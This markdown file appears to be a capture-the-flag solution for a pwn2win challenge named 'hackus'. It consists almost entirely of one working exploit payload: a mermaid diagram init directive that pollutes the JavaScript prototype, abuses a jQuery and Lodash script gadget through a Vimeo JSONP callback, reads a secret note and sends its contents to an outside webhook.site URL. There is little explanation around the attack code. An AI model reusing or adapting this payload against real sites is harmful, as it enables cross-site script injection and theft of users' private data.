pwn2win_hackus.md

Prototype Pollution in mermaid JS + jQuery + Lodash Script Gadget

```mermaid

%%{init: { '__proto__': {'sourceURL': '\u2028\u2029fetch(`https://hackus.xyz/s/secret-note`).then(x=>x.text()).then( x=> fetch(`https://webhook.site/***?flag=`+btoa(x.substr(x.indexOf(`CTF-BR`),100))))','dataType':'script','url':['https://vimeo.com/api/oembed.json?url=https%3A//vimeo.com/286898202&width=480&height=360&callback=_.template']}} }%%
sequenceDiagram
Alice->>Bob: Hi Bob
Bob->>Alice: Hi Alice

.```